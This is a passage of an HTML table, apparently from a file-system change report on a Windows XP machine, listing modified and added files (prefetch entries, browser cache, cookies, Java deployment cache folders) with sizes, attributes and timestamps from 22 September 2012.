<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\jusched.log</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">9KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:07 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">443KB</span></td>
<td><span style="color: black; font-size: xx-small;">476KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:05 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:01 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\PrivacIE\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">115KB</span></td>
<td><span style="color: black; font-size: xx-small;">115KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:43 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:34 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Start Menu\Programs\Windows Media Player.lnk</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:09 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Start Menu\Programs\Accessories\Entertainment\Windows Media Player.lnk</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:09 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\NetworkService\Cookies\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">17KB</span></td>
<td><span style="color: black; font-size: xx-small;">17KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:48:42 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:24:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">17KB</span></td>
<td><span style="color: black; font-size: xx-small;">17KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:48:42 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:24:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:48:42 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:24:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\wmsetup.log</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:09 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf</span></td>
<td><span style="color: black; font-size: xx-small;">14KB</span></td>
<td><span style="color: black; font-size: xx-small;">15KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:18:35 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:32 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\CSRSS.EXE-12B63473.pf</span></td>
<td><span style="color: black; font-size: xx-small;">25KB</span></td>
<td><span style="color: black; font-size: xx-small;">25KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:54 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:23 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\IEXPLORE.EXE-27122324.pf</span></td>
<td><span style="color: black; font-size: xx-small;">113KB</span></td>
<td><span style="color: black; font-size: xx-small;">123KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:49 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:43 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\JAVAW.EXE-2DC32ABC.pf</span></td>
<td><span style="color: black; font-size: xx-small;">50KB</span></td>
<td><span style="color: black; font-size: xx-small;">107KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:58:50 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:06 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\NET.EXE-01A53C2F.pf</span></td>
<td><span style="color: black; font-size: xx-small;">14KB</span></td>
<td><span style="color: black; font-size: xx-small;">18KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:18:30 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\NET1.EXE-029B9DB4.pf</span></td>
<td><span style="color: black; font-size: xx-small;">15KB</span></td>
<td><span style="color: black; font-size: xx-small;">19KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:18:30 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\REGSVR32.EXE-25EEFE2F.pf</span></td>
<td><span style="color: black; font-size: xx-small;">60KB</span></td>
<td><span style="color: black; font-size: xx-small;">61KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:16 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:07 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\TASKMGR.EXE-20256C55.pf</span></td>
<td><span style="color: black; font-size: xx-small;">19KB</span></td>
<td><span style="color: black; font-size: xx-small;">21KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:07:22 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\UNREGMP2.EXE-07CACB61.pf</span></td>
<td><span style="color: black; font-size: xx-small;">26KB</span></td>
<td><span style="color: black; font-size: xx-small;">39KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:09 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf</span></td>
<td><span style="color: black; font-size: xx-small;">20KB</span></td>
<td><span style="color: black; font-size: xx-small;">21KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:26 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\WINLOGON.EXE-32C57D49.pf</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:54 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:24 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\CatRoot2\edb.chk</span></td>
<td><span style="color: black; font-size: xx-small;">9KB</span></td>
<td><span style="color: black; font-size: xx-small;">9KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:41 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:41 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb</span></td>
<td><span style="color: black; font-size: xx-small;">3,154KB</span></td>
<td><span style="color: black; font-size: xx-small;">3,154KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:13 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:13 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\config\system.LOG</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">HA</span></td>
<td><span style="color: black; font-size: xx-small;">HA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:22 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:33 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wbem\Logs\wbemcore.log</span></td>
<td><span style="color: black; font-size: xx-small;">38KB</span></td>
<td><span style="color: black; font-size: xx-small;">38KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:21:49 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wbem\Logs\wbemess.log</span></td>
<td><span style="color: black; font-size: xx-small;">3KB</span></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:07 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wbem\Logs\wbemprox.log</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:49:59 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wbem\Logs\wmiprov.log</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:55:29 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:16 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\GVNZ58AI.txt</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:06:45 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\J695B3FR.txt</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:05:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\JTYOEQBQ.txt</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:44 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{E4F1361D-04D0-11E2-A16B-08002765500A}.dat</span></td>
<td><span style="color: black; font-size: xx-small;">5KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:23:34 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E4F1361F-04D0-11E2-A16B-08002765500A}.dat</span></td>
<td><span style="color: black; font-size: xx-small;">52KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:17:00 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\urlquery_net[1].htm</span></td>
<td><span style="color: black; font-size: xx-small;">41KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:05:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\google_com[1].htm</span></td>
<td><span style="color: black; font-size: xx-small;">108KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:53 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\qsonhs[2].aspx</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:45 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\redir_not_found[1].htm</span></td>
<td><span style="color: black; font-size: xx-small;">6KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:05:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\System Volume Information</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\16</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\17</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\18</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application . Data\Sun\Java\Deployment\SystemCache\6.0\19</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\2</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\20</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\21</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\22</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\23</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\24</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\25</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\26</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\27</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\28</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\29</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\3</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\30</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\31</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94.idx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\33</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\34</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
